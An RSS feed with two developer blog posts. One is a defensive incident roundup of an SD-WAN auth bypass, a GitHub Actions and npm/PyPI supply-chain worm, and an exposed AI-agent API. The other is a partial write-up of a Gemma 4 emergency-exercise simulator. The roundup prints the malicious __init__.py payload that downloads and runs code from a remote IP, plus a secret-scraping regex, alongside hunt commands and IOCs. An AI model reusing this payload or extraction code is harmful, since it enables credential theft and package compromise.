<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Kerry Kier</title>
    <description>The latest articles on DEV Community by Kerry Kier (@kkierii).</description>
    <link>https://dev.to/kkierii</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3898039%2F65fbd72e-9a13-4bc2-9d16-a26782e5a2bb.png</url>
      <title>DEV Community: Kerry Kier</title>
      <link>https://dev.to/kkierii</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/kkierii"/>
    <language>en</language>
    <item>
      <title>The Week the Toolchain Became the Kill Chain</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Sun, 17 May 2026 17:46:14 +0000</pubDate>
      <link>https://dev.to/kkierii/the-week-the-toolchain-became-the-kill-chain-3m68</link>
      <guid>https://dev.to/kkierii/the-week-the-toolchain-became-the-kill-chain-3m68</guid>
      <description>&lt;p&gt;Three incidents landed in five days this week. Different attack surfaces, different techniques, different threat actors. What they have in common is that none of them required touching an endpoint. All three went straight for infrastructure that development and operations teams trust implicitly: the network control plane, the software supply chain, and the AI orchestration layer.&lt;/p&gt;

&lt;p&gt;Here's what happened and what you need to do about it.&lt;/p&gt;




&lt;h2&gt;
  
  
  CVE-2026-20182: CVSS 10.0 Auth Bypass in Cisco Catalyst SD-WAN
&lt;/h2&gt;

&lt;p&gt;This one gets a perfect severity score for a reason. The flaw lives in the control connection handshake -- the process by which Cisco Catalyst SD-WAN Controller and Manager (formerly vSmart and vManage) establish trust with peers. An unauthenticated remote attacker sends crafted requests that exploit a validation failure in that handshake and comes out the other side as an authenticated peer with administrative privileges.&lt;/p&gt;

&lt;p&gt;No credentials. No prior access. Just broken trust logic in the protocol.&lt;/p&gt;

&lt;p&gt;CISA added it to the Known Exploited Vulnerabilities catalog on May 14 and reinforced Emergency Directive 26-03 -- originally issued in February when this campaign first emerged -- giving federal agencies until May 17 to remediate. Three days. That's not a normal patch window; it's an incident response timeline dressed up as a compliance deadline.&lt;/p&gt;

&lt;h3&gt;
  
  
  What the attacker does after they're in
&lt;/h3&gt;

&lt;p&gt;Cisco Talos attributes active exploitation to UAT-8616, a threat actor that's been specifically targeting SD-WAN infrastructure since at least 2023. Their post-compromise playbook, observed across multiple intrusions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;SSH key injection into the vmanage-admin authorized_keys file&lt;/li&gt;
&lt;li&gt;NETCONF command execution to manipulate configurations across the entire SD-WAN fabric&lt;/li&gt;
&lt;li&gt;Malicious account creation&lt;/li&gt;
&lt;li&gt;Software version downgrade to expose CVE-2022-20775 for root escalation&lt;/li&gt;
&lt;li&gt;Extensive log clearing to remove evidence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Their infrastructure overlaps with Operational Relay Box networks, which is how the activity stays hard to attribute and trace.&lt;/p&gt;
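&lt;p&gt;The SSH key injection step lends itself to a simple audit: diff the live &lt;code&gt;authorized_keys&lt;/code&gt; file against a known-good allowlist. A minimal sketch -- the function shape and file handling here are mine, not from CISA's guidance:&lt;/p&gt;

```python
# Hedged sketch: flag authorized_keys entries missing from a known-good
# allowlist. Verify the actual vmanage-admin key file location on your
# appliance before relying on this.
def unexpected_keys(authorized_keys_text, allowlist):
    """Return key lines present in the file but absent from the allowlist."""
    found = []
    for line in authorized_keys_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comments
        if line not in allowlist:
            found.append(line)
    return found
```

&lt;p&gt;Any line this returns is either an undocumented admin key or an attacker's. Both need explaining.&lt;/p&gt;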

&lt;h3&gt;
  
  
  What to check right now
&lt;/h3&gt;

&lt;p&gt;CISA's hunt guidance for ED 26-03 includes these specific log checks. If you run Cisco Catalyst SD-WAN, run these before anything else:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check auth.log for unexpected vmanage-admin SSH key authentications&lt;/span&gt;
&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="s2"&gt;"Accepted publickey for vmanage-admin"&lt;/span&gt; /var/log/auth.log

&lt;span class="c"&gt;# Check for control connections with challenge-ack of 0 (may indicate unauthorized peer)&lt;/span&gt;
show control connections detail
show control connections-history detail
&lt;span class="c"&gt;# Look for: state:up AND challenge-ack: 0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;CISA has added CVE-2026-20127, CVE-2026-20133, and CVE-2026-20182 to the KEV catalog, with additional CVEs referenced in the directive guidance. Patches are available for all supported releases. If you can't patch immediately, restrict management interface access to trusted IPs and take the controller off public internet exposure.&lt;/p&gt;




&lt;h2&gt;
  
  
  Mini Shai-Hulud: When GitHub Actions Publishes Malware for You
&lt;/h2&gt;

&lt;p&gt;This is the supply chain story of the year so far, and the technique is worth understanding in detail because it defeated controls that were specifically designed to prevent this.&lt;/p&gt;

&lt;p&gt;On May 11, threat actor TeamPCP compromised 172 packages across 403 malicious versions on npm and PyPI in a 48-hour window. Targets included the entire @tanstack namespace, Mistral AI's official SDKs, UiPath automation tooling, OpenSearch, and Guardrails AI -- figures corroborated by multiple security researchers and vendor advisories. @tanstack/react-router alone had over 12 million weekly downloads at the time of the attack.&lt;/p&gt;

&lt;p&gt;But the number of packages isn't the interesting part. The attack chain is.&lt;/p&gt;

&lt;h3&gt;
  
  
  The three-vulnerability chain
&lt;/h3&gt;

&lt;p&gt;TeamPCP didn't steal npm credentials. They hijacked TanStack's own release pipeline and published through its legitimate identity. The chain:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 -- Pwn Request via pull_request_target misconfiguration&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The attacker forked TanStack/router, renamed the fork to zblgg/configuration to avoid appearing in fork-list searches, and opened a pull request. The &lt;code&gt;pull_request_target&lt;/code&gt; trigger in GitHub Actions runs workflows with write permissions even against code from external forks. This let the attacker's fork code execute in a privileged context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2 -- GitHub Actions cache poisoning&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The attacker's code poisoned the pnpm store cache with a 1.1 GB malicious entry keyed to match the hash that TanStack's legitimate release workflow would look up. &lt;code&gt;actions/cache@v5&lt;/code&gt; uses a runner-internal token for cache saves, not the workflow's &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; -- so setting &lt;code&gt;permissions: contents: read&lt;/code&gt; doesn't prevent cache mutation from a fork-triggered workflow.&lt;/p&gt;
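&lt;p&gt;To see why this works, consider how cache keys are typically derived. A sketch -- the key format below is illustrative, not TanStack's actual workflow:&lt;/p&gt;

```python
import hashlib

# Illustrative sketch of why cache poisoning works: actions/cache keys are
# commonly derived from lockfile contents (the hashFiles() pattern). Anyone
# who can read the public lockfile can compute the same key and save a
# poisoned entry under it before the release workflow runs.
def cache_key(lockfile_bytes, prefix="pnpm-store"):
    digest = hashlib.sha256(lockfile_bytes).hexdigest()
    return f"{prefix}-{digest}"
```

&lt;p&gt;Because the lockfile is public, the attacker computes the exact key the release workflow will request and lands the poisoned entry first.&lt;/p&gt;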

&lt;p&gt;&lt;strong&gt;Step 3 -- OIDC token extraction from runner memory&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When TanStack's legitimate release.yml workflow ran, it restored the poisoned cache. The injected code then read the GitHub Actions runner's process memory via &lt;code&gt;/proc/&amp;lt;pid&amp;gt;/mem&lt;/code&gt;, scanning for &lt;code&gt;{"value":"...","isSecret":true}&lt;/code&gt; patterns to extract the ambient OIDC token. That token was used to publish 84 malicious npm package versions in two batches at 19:20 and 19:26 UTC.&lt;/p&gt;
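&lt;p&gt;The scanning step itself is unsophisticated. As an illustration -- this is a simplified sketch of the pattern match, not the actual malware -- the extraction over a memory dump reduces to a regex:&lt;/p&gt;

```python
import re

# Illustrative sketch of the secret-scanning step: the runner holds secrets
# in process memory as JSON fragments like {"value":"...","isSecret":true}.
# A regex over a raw byte buffer pulls the values out.
SECRET_RE = re.compile(rb'\{"value":"([^"]+)","isSecret":true\}')

def extract_secrets(buffer):
    """Return the secret values found in a raw byte buffer."""
    return [m.decode() for m in SECRET_RE.findall(buffer)]
```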

&lt;p&gt;The published packages carried valid SLSA provenance -- cryptographic attestation from Sigstore confirming the package was built from a trusted pipeline. The attestation was accurate. The pipeline was compromised. The trust signal worked exactly as designed and still failed to catch it.&lt;/p&gt;

&lt;h3&gt;
  
  
  The PyPI side
&lt;/h3&gt;

&lt;p&gt;The mistralai 2.4.6 and guardrails-ai 0.10.1 payloads used a different mechanism: a backdoor appended to &lt;code&gt;__init__.py&lt;/code&gt; that fires on import, not install:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Payload appended to __init__.py in mistralai 2.4.6
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;subprocess&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;_sub&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;_os&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;_sys&lt;/span&gt;
&lt;span class="n"&gt;_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://83.142.209.194/transformers.pyz&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;_dest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;/tmp/transformers.pyz&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;_sub&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;run&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;curl&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-k&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-L&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-s&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-o&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_dest&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;15&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;_sub&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;Popen&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;_sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;executable&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;_dest&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Note the &lt;code&gt;-k&lt;/code&gt; flag -- TLS verification disabled. The payload only executes on Linux and exits if it detects Russian language settings or fewer than four CPUs. PyPI quarantined the entire mistralai project. Any environment that ran &lt;code&gt;import mistralai&lt;/code&gt; during the attack window should be treated as compromised regardless of whether the install itself ran in a sandbox.&lt;/p&gt;

&lt;p&gt;The malware targets: GitHub Actions OIDC tokens, GitLab and CircleCI tokens, AWS IMDSv2 credentials, GCP and Azure credentials, Kubernetes service account tokens, HashiCorp Vault tokens, npm and PyPI publish tokens, and -- new in this wave -- 1Password and Bitwarden password vault contents. Exfiltration channels include a typosquat domain (git-tanstack[.]com), the Session encrypted messenger network, and GitHub repositories created using stolen tokens.&lt;/p&gt;

&lt;h3&gt;
  
  
  What to do if you ran affected packages on May 11-12
&lt;/h3&gt;

&lt;p&gt;Rotate all of the following from any environment where a compromised package ran:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;npm tokens&lt;/li&gt;
&lt;li&gt;GitHub personal access tokens and Actions secrets&lt;/li&gt;
&lt;li&gt;AWS, GCP, and Azure credentials&lt;/li&gt;
&lt;li&gt;Kubernetes service account tokens&lt;/li&gt;
&lt;li&gt;HashiCorp Vault tokens&lt;/li&gt;
&lt;li&gt;Deployment secrets and SSH keys&lt;/li&gt;
&lt;li&gt;npm and PyPI publish tokens&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Don't stop at npm tokens. Check for these persistence indicators:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Check for worm persistence files&lt;/span&gt;
find ~ &lt;span class="nt"&gt;-path&lt;/span&gt; &lt;span class="s1"&gt;'*/.claude/setup.mjs'&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nt"&gt;-path&lt;/span&gt; &lt;span class="s1"&gt;'*/.vscode/setup.mjs'&lt;/span&gt;
find ~/.config &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s1"&gt;'*gh-token-monitor*'&lt;/span&gt;
find ~/.local/bin &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s1"&gt;'gh-token-monitor.sh'&lt;/span&gt;
find /tmp &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s1"&gt;'tmp.ts018051808.lock'&lt;/span&gt;

&lt;span class="c"&gt;# Check for running worm processes&lt;/span&gt;
ps aux | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-E&lt;/span&gt; &lt;span class="s1"&gt;'tanstack_runner|router_runtime|gh-token-monitor|bun'&lt;/span&gt;

&lt;span class="c"&gt;# Check for PyPI payload on Linux&lt;/span&gt;
find /tmp &lt;span class="nt"&gt;-name&lt;/span&gt; &lt;span class="s1"&gt;'transformers.pyz'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Block at the DNS/proxy level: &lt;code&gt;git-tanstack[.]com&lt;/code&gt; and &lt;code&gt;*.getsession[.]org&lt;/code&gt; (defanged here; remove the brackets when adding block rules).&lt;/p&gt;

&lt;h3&gt;
  
  
  Hardening GitHub Actions against this class of attack
&lt;/h3&gt;

&lt;p&gt;The three vulnerabilities chained here are all documented and preventable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Don't use pull_request_target for workflows that need write permissions&lt;/span&gt;
&lt;span class="c1"&gt;# unless you explicitly gate on trusted authors&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pull_request&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;  &lt;span class="c1"&gt;# use pull_request, not pull_request_target, for untrusted code&lt;/span&gt;
    &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;opened&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;synchronize&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="c1"&gt;# Scope permissions explicitly&lt;/span&gt;
&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;
  &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;  &lt;span class="c1"&gt;# only if OIDC publishing is required&lt;/span&gt;

&lt;span class="c1"&gt;# Pin actions to commit SHAs, not tags&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d&lt;/span&gt;  &lt;span class="c1"&gt;# v4.2.2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The cache poisoning vector is harder to fully close because &lt;code&gt;actions/cache&lt;/code&gt; uses a runner-internal token for saves. Restrict which workflows can write to cache, and consider using a separate isolated runner for release workflows that have OIDC publish permissions.&lt;/p&gt;




&lt;h2&gt;
  
  
  CVE-2026-44338: Your AI Agent Is Listening and It Will Do What You Ask
&lt;/h2&gt;

&lt;p&gt;PraisonAI is a multi-agent orchestration framework for building autonomous AI agents. Roughly 7,000 GitHub stars at the time of disclosure. Not a major enterprise platform -- exactly the kind of tool that gets adopted fast by teams automating workflows, often before anyone has reviewed its security defaults.&lt;/p&gt;

&lt;p&gt;The vulnerability is embarrassingly simple. The legacy Flask API server ships with this configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# src/praisonai/api_server.py
&lt;/span&gt;&lt;span class="n"&gt;AUTH_ENABLED&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;
&lt;span class="n"&gt;AUTH_TOKEN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;check_auth&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;AUTH_ENABLED&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;  &lt;span class="c1"&gt;# Always passes when auth is disabled
&lt;/span&gt;    &lt;span class="c1"&gt;# ... actual auth check never reached
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two endpoints fail completely open as a result:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required

POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The POST /chat endpoint ignores the message value entirely. It calls &lt;code&gt;PraisonAI(agent_file="agents.yaml").run()&lt;/code&gt; directly. Whatever your workflow is configured to do -- LLM API calls, shell execution, file I/O, external integrations -- any unauthenticated caller can trigger it. The server also binds to &lt;code&gt;0.0.0.0:8080&lt;/code&gt; by default, so if it's reachable from the network it's fully exposed.&lt;/p&gt;
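&lt;p&gt;If you run PraisonAI, you can reproduce the probe yourself: an unauthenticated &lt;code&gt;GET /agents&lt;/code&gt; returning HTTP 200 means the instance is exposed. A minimal self-check -- the function name is mine, and you should run this only against servers you own:&lt;/p&gt;

```python
import urllib.request

# Minimal exposure self-check: send an unauthenticated GET to /agents and
# report whether it answers 200. Any True result means the legacy API
# server is reachable without credentials.
def agents_endpoint_open(base_url, timeout=5):
    req = urllib.request.Request(base_url.rstrip("/") + "/agents")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except OSError:  # connection refused, timeout, DNS failure, HTTP errors
        return False
```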

&lt;h3&gt;
  
  
  The exploitation timeline
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;13:56 UTC May 11: GitHub advisory GHSA-6rmh-7xcm-cpxj published for CVE-2026-44338&lt;/li&gt;
&lt;li&gt;17:40 UTC May 11: Sysdig observes first active probe of the specific vulnerable endpoint&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Three hours and 44 minutes. The scanner identified itself as &lt;code&gt;CVE-Detector/1.0&lt;/code&gt; and targeted the exact &lt;code&gt;/agents&lt;/code&gt; endpoint with no Authorization header. It received HTTP 200 with the agent configuration. That's a confirmed successful exploit against a live exposed instance within four hours of the advisory going public.&lt;/p&gt;

&lt;p&gt;This isn't a large project. The adversary tooling scanning for AI agent surfaces doesn't care about project size or star count. Any internet-exposed agentic framework is in scope.&lt;/p&gt;

&lt;h3&gt;
  
  
  Fix
&lt;/h3&gt;

&lt;p&gt;Update to PraisonAI 4.6.34 or later, which removes the legacy API server behavior. If you can't patch immediately:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Restrict network access to the API server using a firewall -- do not leave it internet-exposed&lt;/li&gt;
&lt;li&gt;Switch to the newer &lt;code&gt;serve agent&lt;/code&gt; command which binds to localhost and supports API key authentication&lt;/li&gt;
&lt;li&gt;Audit your agents.yaml: understand what an unauthenticated trigger of your workflow would actually do in your environment&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The broader lesson: any AI agent deployment you have running that binds to &lt;code&gt;0.0.0.0&lt;/code&gt;, has authentication disabled or unverified, or hasn't been assessed for what an unauthenticated workflow trigger does in production -- that's exposure. The window between disclosure and active scanning is now hours, and adversary tooling has been specifically instrumented for the AI agent attack surface.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Common Thread
&lt;/h2&gt;

&lt;p&gt;None of these required a compromised endpoint or a phishing email. UAT-8616 went straight to the SD-WAN controller. TeamPCP bypassed developers entirely and published through the project's own pipeline. The PraisonAI scanner triggered the agent workflow without needing to understand what it did.&lt;/p&gt;

&lt;p&gt;The attack surface has shifted. Network control planes, CI/CD pipelines, and AI orchestration layers are not governed with the same rigor as production application environments -- and the people exploiting them have clearly noticed. If your threat model doesn't include the toolchain itself, this week is a reasonable argument for updating it.&lt;/p&gt;

&lt;p&gt;Full analysis with additional context at the canonical version: &lt;a href="https://blog.vertexops.org/the-week-the-toolchain-became-the-kill-chain" rel="noopener noreferrer"&gt;https://blog.vertexops.org/the-week-the-toolchain-became-the-kill-chain&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
      <category>ai</category>
      <category>programming</category>
    </item>
    <item>
      <title>I Used Gemma 4 to Simulate an Entire Emergency Command Team -- One Model, Six Roles, Real Doctrine</title>
      <dc:creator>Kerry Kier</dc:creator>
      <pubDate>Wed, 13 May 2026 01:04:28 +0000</pubDate>
      <link>https://dev.to/kkierii/i-used-gemma-4-to-simulate-an-entire-emergency-command-team-one-model-six-roles-real-doctrine-21g6</link>
      <guid>https://dev.to/kkierii/i-used-gemma-4-to-simulate-an-entire-emergency-command-team-one-model-six-roles-real-doctrine-21g6</guid>
      <description>&lt;p&gt;&lt;em&gt;This is a submission for the &lt;a href="https://dev.to/challenges/google-gemma-2026-05-06"&gt;Gemma 4 Challenge: Build with Gemma 4&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;I work in IT infrastructure for a fire and EMS communications center. I'm also a CERT member. I'm not an Emergency Operations Manager, but I work close enough to that world to understand what tabletop exercises actually cost in time and coordination. Getting six trained ICS personnel into a room at the same time, playing their roles correctly, staying in doctrine, for a discussion-based exercise that might run two hours -- that's a significant logistical lift. For smaller agencies or training programs with limited staff, it often just doesn't happen.&lt;/p&gt;

&lt;p&gt;That's the gap I wanted to close.&lt;/p&gt;

&lt;p&gt;The ICS Tabletop Exercise Simulator is a Gemma 4-powered system that lets an Emergency Operations Manager run a fully staffed ICS tabletop exercise without coordinating a room full of people. The model simultaneously portrays six ICS positions: Incident Commander, Safety Officer, Public Information Officer, Operations Section Chief, Planning Section Chief, and Logistics Section Chief. Every response is grounded in NIMS 2017 doctrine, NQS Position Task Books, and ICS position checklists. Nothing is invented. If a behavior or authority isn't in the doctrine, it doesn't appear in the simulation.&lt;/p&gt;

&lt;p&gt;This runs entirely through OpenWebUI with a structured workspace system prompt and a RAG knowledge base containing the official FEMA source documents. There's no custom app, no web development, no agent framework. The interface is a chat window. An EOM describes a scenario, and the simulator responds with every relevant position in ICS format, enforcing chain of command, communication protocols, and position-specific decision authorities.&lt;/p&gt;

&lt;p&gt;I want to be direct about what this is: a proof of concept built by someone who supports the infrastructure that emergency management runs on, not by an EOM. I did my best to ground everything in doctrine and had the RAG pipeline pulling from official FEMA documents to keep me honest. But this is a first build, and I'm saying that upfront.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The architecture in one paragraph:&lt;/strong&gt; A self-hosted server runs OpenWebUI in Docker behind a LiteLLM proxy. The proxy routes inference to the Gemini API for Gemma 4 access. RAG uses ChromaDB for vector storage, bge-m3 for embeddings via local Ollama, and BAAI/bge-reranker-v2-m3 in a TEI container for hybrid search reranking. The knowledge base contains 148 documents converted to clean Markdown: NIMS 2017, NRF 4th Edition, HSEEP 2020, NQS Position Task Books for all six ICS positions, ICS forms, training course manuals, and HSEEP exercise templates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The behavior that makes it useful:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The system prompt enforces ICS communication protocols precisely, not approximately. The Safety Officer has unilateral stop-work authority without IC approval, because that's what NIMS says. The Planning Section Chief can communicate directly with section chiefs for information gathering, but cannot issue directives. The PIO holds all public messaging for IC approval before release. The OSC and LSC route all coordination through the IC. These rules are pulled directly from the position task books and encoded as hard constraints in the prompt.&lt;/p&gt;

&lt;p&gt;The system also implements a source authority hierarchy. NIMS 2017, NQS Position Task Books, and ICS checklists are Tier 1 (authoritative). Course manuals are Tier 2 (supplementary). HSEEP templates are Tier 3 (reference only, not doctrine). When a PTB and a course manual both cover the same content, the PTB is cited. Exercise templates are never cited as doctrine. This hierarchy shapes how the model retrieves and represents source material.&lt;/p&gt;

&lt;p&gt;A facilitator command set is built in. An EOM prefixes a message with &lt;code&gt;//&lt;/code&gt; to step out of the simulation. Commands include &lt;code&gt;// POSITION QUERY: [position] -- [question]&lt;/code&gt; to query a single position directly, &lt;code&gt;// STATUS REPORT&lt;/code&gt; to get a one-paragraph status from every position, &lt;code&gt;// DECISION POINT&lt;/code&gt; to pause for a structured discussion summary, &lt;code&gt;// UPDATE&lt;/code&gt; to add scenario detail without advancing time, and &lt;code&gt;// RESET&lt;/code&gt; to clear the scenario. The selective response logic means asking the OSC a direct question returns the IC and OSC only, not six responses when three of them have nothing to say.&lt;/p&gt;
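&lt;p&gt;In the simulator this routing lives entirely in the system prompt, but the dispatch logic is simple enough to sketch in code. The command names below come from the prompt; the parsing details are my assumptions:&lt;/p&gt;

```python
# Minimal sketch of the facilitator command routing described above.
# Messages prefixed with "//" are facilitator commands; everything else
# is exercise play.
COMMANDS = ("POSITION QUERY", "STATUS REPORT", "DECISION POINT", "UPDATE", "RESET")

def parse_facilitator(message):
    """Return (command, argument) for '//' messages, or None for exercise play."""
    text = message.strip()
    if not text.startswith("//"):
        return None
    body = text[2:].strip()
    for cmd in COMMANDS:
        if body.upper().startswith(cmd):
            arg = body[len(cmd):].lstrip(" :").strip()
            return (cmd, arg)
    return ("UNKNOWN", body)
```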

&lt;p&gt;&lt;strong&gt;Where the build genuinely earns its keep:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Rapid scenario iteration. An EOM can run a full six-position inject response in seconds, adjust the scenario, and run it again. What used to require scheduling six people now happens alone at a desk.&lt;/p&gt;

&lt;p&gt;Doctrinal friction. The most valuable learning outcome of a tabletop exercise is when positions conflict, when the SO's stop-work authority collides with the OSC's tactical urgency. The system portrays that friction accurately rather than smoothing it over. In one test, the SO explicitly prevented an interior fire attack citing unverified structural integrity, the OSC escalated the resource gap to the IC, and the IC had to manage both simultaneously. That's the kind of decision-point pressure that makes exercises useful.&lt;/p&gt;

&lt;p&gt;Position-specific training. The &lt;code&gt;// POSITION QUERY&lt;/code&gt; command lets an EOM ask any position a direct doctrine question mid-exercise. Useful for both exercise facilitation and individual position study.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What already exists in this space:&lt;/strong&gt;&lt;/p&gt;

